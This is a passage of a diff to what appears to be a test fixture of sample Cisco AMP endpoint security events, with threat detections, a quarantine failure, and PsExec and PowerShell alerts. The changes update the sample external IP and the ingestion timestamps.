found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"identity\":{\"sha256\":\"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e\"}}}}", + "ingested": "2021-12-09T13:35:29.222493900Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587034675643000,\"timestamp\":1610618511,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T10:01:51+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6880587034675642558\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225530,\"description\":\"Object path not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"identity\":{\"sha256\":\"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -1453,7 +1453,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Unknown", @@ -1498,7 +1498,7 @@ "5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -1508,8 +1508,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:13:59.322455312Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587034675643000,\"timestamp\":1610618511,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T10:01:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6880587034675642558\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225530,\"description\":\"Object path not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"identity\":{\"sha256\":\"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e\"}}}}", + "ingested": "2021-12-09T13:35:29.222498300Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587034675643000,\"timestamp\":1610618511,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T10:01:51+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6880587034675642558\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225530,\"description\":\"Object path not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"identity\":{\"sha256\":\"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -1526,7 +1526,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Unknown", @@ -1585,7 +1585,7 @@ "1e5d8b8b8e0d8b74643f7a68430f8dc703290190cc60dcdb4f08c9ecae342b48" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -1602,8 +1602,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:13:59.322457554Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587030380676000,\"timestamp\":1610618510,\"timestamp_nanoseconds\":737000000,\"date\":\"2021-01-14T10:01:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"Generic.Malware.WX.9E93D282\",\"detection_id\":\"6880587021790740668\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"file_name\":\"p3fci4nu.dll\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\Temp\\\\p3fci4nu\\\\p3fci4nu.dll\",\"identity\":{\"sha256\":\"1e5d8b8b8e0d8b74643f7a68430f8dc703290190cc60dcdb4f08c9ecae342b48\"},\"parent\":{\"process_id\":6708,\"disposition\":\"Clean\",\"file_name\":\"csc.exe\",\"identity\":{\"sha256\":\"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57\",\"sha1\":\"93cf877f5627e55ec076a656e935042fac39950e\",\"md5\":\"23ee3d381cfe3b9f6229483e2ce2f9e1\"}}}}}", + "ingested": "2021-12-09T13:35:29.222502500Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587030380676000,\"timestamp\":1610618510,\"timestamp_nanoseconds\":737000000,\"date\":\"2021-01-14T10:01:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"Generic.Malware.WX.9E93D282\",\"detection_id\":\"6880587021790740668\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"file_name\":\"p3fci4nu.dll\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\Temp\\\\p3fci4nu\\\\p3fci4nu.dll\",\"identity\":{\"sha256\":\"1e5d8b8b8e0d8b74643f7a68430f8dc703290190cc60dcdb4f08c9ecae342b48\"},\"parent\":{\"process_id\":6708,\"disposition\":\"Clean\",\"file_name\":\"csc.exe\",\"identity\":{\"sha256\":\"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57\",\"sha1\":\"93cf877f5627e55ec076a656e935042fac39950e\",\"md5\":\"23ee3d381cfe3b9f6229483e2ce2f9e1\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -1624,7 +1624,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { 
@@ -1676,7 +1676,7 @@
 "3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef"
 ],
 "ip": [
- "8.8.8.8",
+ "81.2.69.144",
 "10.10.10.10"
 ]
 },
@@ -1686,8 +1686,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:13:59.322459771Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":460392585524661250,\"timestamp\":1610618215,\"timestamp_nanoseconds\":615000000,\"date\":\"2021-01-14T09:56:55+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618215,\"start_date\":\"2021-01-14T09:56:55+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"The psexec utility was executed as admin.\",\"short_description\":\"W32.PsexecAsAdmin.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"PsExec.exe\",\"file_path\":\"file:///C%3A/share%24/PsExec.exe\",\"identity\":{\"sha256\":\"3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386\"}}}}}", + "ingested": "2021-12-09T13:35:29.222506Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":460392585524661250,\"timestamp\":1610618215,\"timestamp_nanoseconds\":615000000,\"date\":\"2021-01-14T09:56:55+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618215,\"start_date\":\"2021-01-14T09:56:55+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"The psexec utility was executed as admin.\",\"short_description\":\"W32.PsexecAsAdmin.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"PsExec.exe\",\"file_path\":\"file:///C%3A/share%24/PsExec.exe\",\"identity\":{\"sha256\":\"3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386\"}}}}}", "code": "1107296274", "kind": "alert", "start": "2021-01-14T09:56:55.000Z", @@ -1708,7 +1708,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -1762,7 +1762,7 @@ "5ca4bef8de6def53519d4b22632675bb4c1e470b" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -1776,8 +1776,8 @@ }, "event": { "severity": 0, - "ingested": "2021-09-30T00:13:59.322461976Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6508191586038317000,\"timestamp\":1610611000,\"timestamp_nanoseconds\":758406329,\"date\":\"2021-01-14T07:56:40+00:00\",\"event_type\":\"File Fetch Completed\",\"event_type_id\":553648173,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"resume.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Desktop\\\\resume.exe\",\"identity\":{\"sha256\":\"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86\",\"sha1\":\"5ca4bef8de6def53519d4b22632675bb4c1e470b\",\"md5\":\"41476df3138717868118d8542cf3d1d6\"}}}}", + "ingested": "2021-12-09T13:35:29.222510400Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6508191586038317000,\"timestamp\":1610611000,\"timestamp_nanoseconds\":758406329,\"date\":\"2021-01-14T07:56:40+00:00\",\"event_type\":\"File Fetch Completed\",\"event_type_id\":553648173,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"resume.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Desktop\\\\resume.exe\",\"identity\":{\"sha256\":\"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86\",\"sha1\":\"5ca4bef8de6def53519d4b22632675bb4c1e470b\",\"md5\":\"41476df3138717868118d8542cf3d1d6\"}}}}", "code": "553648173", "kind": "alert", "action": "File Fetch Completed", @@ -1798,7 +1798,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1845,7 +1845,7 @@ "a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -1855,8 +1855,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:13:59.322464211Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":7007136035192884000,\"timestamp\":1610603346,\"timestamp_nanoseconds\":403000000,\"date\":\"2021-01-14T05:49:06+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610603346,\"start_date\":\"2021-01-14T05:49:06+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. 
Malware authors may use this technique to bypass antivirus tools.\",\"short_description\":\"W32.PowershellEncodedBuffer.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"file:///C%3A/Windows/System32/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8\"}}}}}", + "ingested": "2021-12-09T13:35:29.222516300Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":7007136035192884000,\"timestamp\":1610603346,\"timestamp_nanoseconds\":403000000,\"date\":\"2021-01-14T05:49:06+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610603346,\"start_date\":\"2021-01-14T05:49:06+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. 
Malware authors may use this technique to bypass antivirus tools.\",\"short_description\":\"W32.PowershellEncodedBuffer.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"file:///C%3A/Windows/System32/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8\"}}}}}", "code": "1107296274", "kind": "alert", "start": "2021-01-14T05:49:06.000Z", @@ -1877,7 +1877,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -1926,7 +1926,7 @@ "6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -1936,8 +1936,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:13:59.322466602Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1515350231459808800,\"timestamp\":1610584664,\"timestamp_nanoseconds\":0,\"date\":\"2021-01-14T00:37:44+00:00\",\"event_type\":\"Threat Detected in Low Prevalence Executable\",\"event_type_id\":1107296278,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"resume.exe\",\"identity\":{\"sha256\":\"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86\"}}}}", + "ingested": "2021-12-09T13:35:29.222522400Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1515350231459808800,\"timestamp\":1610584664,\"timestamp_nanoseconds\":0,\"date\":\"2021-01-14T00:37:44+00:00\",\"event_type\":\"Threat Detected in Low Prevalence 
Executable\",\"event_type_id\":1107296278,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"resume.exe\",\"identity\":{\"sha256\":\"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86\"}}}}", "code": "1107296278", "kind": "alert", "action": "Threat Detected in Low Prevalence Executable", @@ -1958,7 +1958,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2004,7 +2004,7 @@ "5ca4bef8de6def53519d4b22632675bb4c1e470b" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -2018,8 +2018,8 @@ }, "event": { "severity": 0, - "ingested": "2021-09-30T00:13:59.322468873Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6508191586038317000,\"timestamp\":1610584030,\"timestamp_nanoseconds\":579890366,\"date\":\"2021-01-14T00:27:10+00:00\",\"event_type\":\"File Fetch Completed\",\"event_type_id\":553648173,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"resume.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Desktop\\\\resume.exe\",\"identity\":{\"sha256\":\"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86\",\"sha1\":\"5ca4bef8de6def53519d4b22632675bb4c1e470b\",\"md5\":\"41476df3138717868118d8542cf3d1d6\"}}}}", + "ingested": "2021-12-09T13:35:29.222528100Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6508191586038317000,\"timestamp\":1610584030,\"timestamp_nanoseconds\":579890366,\"date\":\"2021-01-14T00:27:10+00:00\",\"event_type\":\"File Fetch Completed\",\"event_type_id\":553648173,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"resume.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Desktop\\\\resume.exe\",\"identity\":{\"sha256\":\"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86\",\"sha1\":\"5ca4bef8de6def53519d4b22632675bb4c1e470b\",\"md5\":\"41476df3138717868118d8542cf3d1d6\"}}}}", "code": "553648173", "kind": "alert", "action": "File Fetch Completed", @@ -2040,7 +2040,7 @@ } ], "connector_guid": 